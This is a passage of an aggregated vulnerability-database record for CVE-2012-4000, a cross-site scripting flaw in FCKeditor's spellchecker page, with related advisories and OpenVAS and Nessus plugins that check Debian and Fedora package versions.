Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71499\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2012-4000\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:20:46 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2522-1 (fckeditor)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202522-1\");\n script_tag(name:\"insight\", value:\"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your fckeditor packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-1squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-3\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:51:03", "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2522-1 (fckeditor)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:71499", "href": "http://plugins.openvas.org/nasl.php?oid=71499", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2522_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2522-1 (fckeditor)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\nWe recommend that you upgrade your fckeditor packages.\";\ntag_summary = \"The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202522-1\";\n\nif(description)\n{\n script_id(71499);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2012-4000\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:20:46 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2522-1 (fckeditor)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-1squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"fckeditor\", ver:\"1:2.6.6-3\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "nessus": [{"lastseen": "2021-08-19T12:57:48", "description": "Emilio Pinna discovered a cross site scripting vulnerability in the spellchecker.php page of FCKeditor, a popular HTML/DHTML editor for the web.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-07T00:00:00", "type": "nessus", "title": "Debian DSA-2522-1 : fckeditor - XSS", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:fckeditor", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2522.NASL", "href": "https://www.tenable.com/plugins/nessus/61438", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2522. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61438);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-4000\");\n script_bugtraq_id(54188);\n script_xref(name:\"DSA\", value:\"2522\");\n\n script_name(english:\"Debian DSA-2522-1 : fckeditor - XSS\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Emilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular HTML/DHTML editor for\nthe web.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683418\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/fckeditor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2012/dsa-2522\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the fckeditor packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:fckeditor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"fckeditor\", reference:\"1:2.6.6-1squeeze1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-03-27T14:52:05", "description": "Zarafa Collaboration Platform 7.1.14 final [51822] ================================================== - ZCP-13581: update fck- editor (for webaccess) to solve CVE-2012-4000 - ZCP-13572:\nCVE-2015-6566 - zarafa-autorespond suffers from a potential local privilege escalation - ZCP-13087: Meeting requests are not being sent with Thunderbird Lightning due to new functionality - ZCP-13608:\nAttachments are missing in the Sent items folder when using a cache profile - ZCP-13243: ser_safe_mode falsely reports that it would delete users\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.4, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 21 : zarafa-7.1.14-1.fc21 (2015-a275fd68f2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000", "CVE-2015-6566"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:zarafa", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-A275FD68F2.NASL", "href": "https://www.tenable.com/plugins/nessus/89347", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-a275fd68f2.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89347);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-6566\");\n script_xref(name:\"FEDORA\", value:\"2015-a275fd68f2\");\n\n script_name(english:\"Fedora 21 : zarafa-7.1.14-1.fc21 (2015-a275fd68f2)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Zarafa Collaboration Platform 7.1.14 final [51822]\n================================================== - ZCP-13581: update\nfck- editor (for webaccess) to solve CVE-2012-4000 - ZCP-13572:\nCVE-2015-6566 - zarafa-autorespond suffers from a potential local\nprivilege escalation - ZCP-13087: Meeting requests are not being sent\nwith Thunderbird Lightning due to new functionality - ZCP-13608:\nAttachments are missing in the Sent items folder when using a cache\nprofile - ZCP-13243: ser_safe_mode falsely reports that it would\ndelete users\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1263006\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172605.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb9d58dc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected zarafa package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:zarafa\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"zarafa-7.1.14-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"zarafa\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "osv": [{"lastseen": "2022-07-21T08:30:41", "description": "\nEmilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular HTML/DHTML editor for the web.\n\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\n\nWe recommend that you upgrade your fckeditor packages.\n\n\n", "cvss3": {}, "published": "2012-08-05T00:00:00", "type": "osv", "title": "fckeditor - cross site scripting", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2022-07-21T05:47:46", "id": "OSV:DSA-2522-1", "href": "https://osv.dev/vulnerability/DSA-2522-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:29:33", "description": "Cross-site scripting (XSS) vulnerability in the print_textinputs_var\nfunction in\neditor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\nin FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary\nweb script or HTML via textinputs array parameters.", "cvss3": {}, "published": "2012-07-12T00:00:00", "type": "ubuntucve", "title": "CVE-2012-4000", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2012-07-12T00:00:00", "id": "UB:CVE-2012-4000", "href": "https://ubuntu.com/security/CVE-2012-4000", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-04T14:20:37", "description": "Cross-site scripting (XSS) vulnerability in\neditor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\nin FCKeditor before 2.6.11 and earlier allows remote attackers to inject\narbitrary web script or HTML via an array key in the textinputs[]\nparameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4037", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2014-06-11T00:00:00", "id": "UB:CVE-2014-4037", "href": "https://ubuntu.com/security/CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "The Zarafa Collaboration Platform is a Microsoft Exchange replacement. The Open Source Collaboration provides an integration with your existing Linux mail server, native mobile phone support by ActiveSync compatibility and a webaccess with 'Look & Feel' similar to Outlook using Ajax. Including an IMAP and a POP3 gateway as well as an iCal/CalDAV gateway, the Zarafa Open Source Collaboration can combine the usability with the stability and the flexibility of a Linux server. The proven Zarafa groupware solution is using MAPI objects, provides a MAPI client library as well as programming interfaces for C++, PHP and Python. The other Zarafa related packages need to be installed to gain all features and benefits of the Zarafa Collaboration Platform (ZCP). ", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-11-23T23:21:38", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: zarafa-7.1.14-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2015-6566"], "modified": "2015-11-23T23:21:38", "id": "FEDORA:B8A8E6087CFC", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/ZO2KZ7XX3R2APFUTE2O2Y3ZFTV3IOYE3/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "debiancve": [{"lastseen": "2022-07-04T06:00:54", "description": "Cross-site scripting (XSS) vulnerability in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor before 2.6.11 and earlier allows remote attackers to inject arbitrary web script or HTML via an array key in the textinputs[] parameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T14:55:00", "type": "debiancve", "title": "CVE-2014-4037", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2014-06-11T14:55:00", "id": "DEBIANCVE:CVE-2014-4037", "href": "https://security-tracker.debian.org/tracker/CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}]}
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
